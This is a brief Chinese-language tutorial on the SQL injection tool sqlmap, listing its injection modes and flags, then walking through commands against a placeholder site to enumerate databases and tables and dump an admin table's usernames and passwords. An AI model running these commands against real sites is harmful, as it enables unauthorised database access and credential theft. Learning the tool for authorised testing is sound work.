首先,先简单介绍下sqlmap简介:
sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。
支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。
sqlmap支持五种不同的注入模式:UNION query SQL injection(可联合查询注入
Error-based SQL injection(报错型注入)
Boolean-based blind SQL injection(布尔型注入)
Time-based blind SQL injection(基于时间延迟注入)
Stacked queries SQL injection(可多语句查询注入)基本用法:-u 使用sqlmap
--dbs 获取数据库名
--tables 获取表名
--columns 获取字段名
--dump 获取字段内容实战:1.获取库名
python2 sqlmap.py -u "http://xxx.com" --dbs
成功获取库名
接下来得根据经验,猜他的账户,密码 在哪个库里,或者都进去看看也可以。
2.继续获取表名
python2 sqlmap.py -u "http://xxx.com" -D 库名 --tables
看见admin 看来离目标 不远了
3.获取字段名
python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin --columns
看到admin_name admin _pass 果然就在这
4.获取用户名,密码
python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin -C admin_name,admin_pass --dump
本文转自:黑白之道